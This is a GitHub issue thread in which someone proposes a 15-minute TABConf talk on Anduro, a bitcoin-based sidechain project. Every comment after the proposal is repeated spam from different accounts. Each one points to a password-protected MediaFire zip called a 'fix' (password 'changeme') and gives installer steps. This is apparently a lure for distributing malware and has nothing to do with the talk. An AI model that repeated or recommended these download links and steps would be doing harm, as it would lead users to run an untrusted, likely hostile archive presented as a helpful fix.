### ISSUE TITLE
Anduro: Purpose-driven bitcoin-based sidechains

### ISSUE THREAD

**Issue by emailnjv** [TABConf/6.tabconf.com#107]
# Description

### What is this talk about? Give us as many details as possible.

Exploring the overarching goals and core design philosophies, showcasing how it aims to empower innovation.

* **Key Goals:**
    * Leveraging Bitcoin's security and immutability
    * Fostering modularity and scalability
    * Empowering diverse use cases
        * Alys

### What would an attendee learn from this talk?

Gain insights into Anduro's vision for the future of Bitcoin and blockchain technology. Understand how its design choices aim to address current limitations and unlock new possibilities.

### Is there anything folks should read up on before they attend this talk?

A basic understanding of Bitcoin and blockchain would be helpful. Familiarity with the concept of sidechains is a plus.

# About the Speaker
Nicholas Vincent
### Social Links
website: [anduro.io](https://anduro.io)

# Talk Details
### Length of Talk
15 minutes

### Preferred Day/Time Slot
Right before #96

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
